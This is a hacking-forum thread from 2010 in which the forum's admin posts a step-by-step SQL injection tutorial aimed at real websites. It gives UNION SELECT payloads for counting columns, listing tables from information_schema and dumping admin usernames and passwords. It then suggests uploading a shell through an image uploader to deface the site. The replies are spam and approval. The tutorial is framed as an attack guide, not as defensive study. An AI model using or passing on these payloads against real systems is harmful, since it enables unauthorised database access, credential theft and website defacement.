Net-Bashers
Would you like to react to this message? Create an account in a few clicks or log in to continue.

SQLi tutorial.

3 posters

Go down

SQLi tutorial. Empty SQLi tutorial.

Post  C0RPS3 Fri May 21, 2010 3:50 pm

The easiest thing to do is use a vulnerability scanner such as reilukes.Once you find one with that scanner you move on, make sure IT isn't a fale entery and put a ' at THE end, if IT comes back with a syntax error IT's vuln.2) Next your going to find out how many columns IT has, to to do this you need to put this. [example] http://www.site.com/news/news.php?id=10 order by 5-- if IT comes back with a syntax error, take IT down one or two to see if that is THE right number of columns, IT should say something like "no such column" whenever THE page returns to normal THE next number up is your ammount of columns.3) Addressing THE vulnerable part is simple, your searching for a visible column, to do this you'd use union injection here so you'd put something like this. [example] http://www.site.com/news/news.php?id=-15 union all select 1,2,3,4,5,6-- once you execute this command, IT should come up with any number between 1 and 6 on THE page, that's THE column we are
C0RPS3
C0RPS3
Admin

Posts : 10
Join date : 2010-05-15

http://www.net-bashers.org or www.net-bashers.tk

Back to top Go down

SQLi tutorial. Empty Re: SQLi tutorial.

Post  C0RPS3 Fri May 21, 2010 3:51 pm

injecting into.
4) Now we are going to get THE tables from THE visible column, say we have a visible column number 3. [example] http://www.site.com/news/news.php?id=-15 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()-- once you execute this command you will look for something in THE list like admin_login.5) Once you find THE table your going to be going into, delete everything, back to where you typed from at THE end of THE numbers, now where IT says (table_name) replace that with (column_name) and type THE following. [example] http://www.site.com/news/news.php?id=-15 union all select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=char(x)-- now your going to replace THE x with something. you have to convert THE table your going into into ascii. http://getyourwebsitehere.com/jswb/text_to_ascii.html is my fave one to use. so now once you convert IT, get rid of all symbols inbetween THE numbers, and replace them with comas
C0RPS3
C0RPS3
Admin

Posts : 10
Join date : 2010-05-15

http://www.net-bashers.org or www.net-bashers.tk

Back to top Go down

SQLi tutorial. Empty Re: SQLi tutorial.

Post  C0RPS3 Fri May 21, 2010 3:52 pm

paste IT into THE (x) after you get rid of THE x, so now you'd have.
[example] www.site.com/news/news.php?id=-15 union all select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=char(97,100,109,105,110,95,108,111,103,105,110)-- execute this command and IT should show THE columns of that table, now then take THE ones you see like username, and password, copy them you'll need them.6) Now IT's time to finish up, delete all THE way back to where IT said (column_name) and type in as THE following, if you copied username, and password.
[example] www.site.com/news/news.php?id=-15 union all select 1,2,group_concat(username,0x3a,password),4,5,6 from admin_login-- and hit enter, IT should exploit THE admin username and password, there you go but raped.
If you wan't IT's not entirly needed, but you can go into THE admin login, and upload a shell into a picture uploader, from there you can deface THE entire front page.
C0RPS3
C0RPS3
Admin

Posts : 10
Join date : 2010-05-15

http://www.net-bashers.org or www.net-bashers.tk

Back to top Go down

SQLi tutorial. Empty Re: SQLi tutorial.

Post  brightmix Mon Sep 13, 2010 8:14 pm

I know wot Ur thinking.......................LOL

Do you?

http://www.weddingdressebay.com

brightmix

Posts : 1
Join date : 2010-09-13

Back to top Go down

SQLi tutorial. Empty Re: SQLi tutorial.

Post  w33dp0t Wed Aug 21, 2013 2:39 pm

Evil or Very Mad lol nice

w33dp0t

Posts : 1
Join date : 2013-08-21

Back to top Go down

SQLi tutorial. Empty Re: SQLi tutorial.

Post  Sponsored content


Sponsored content


Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum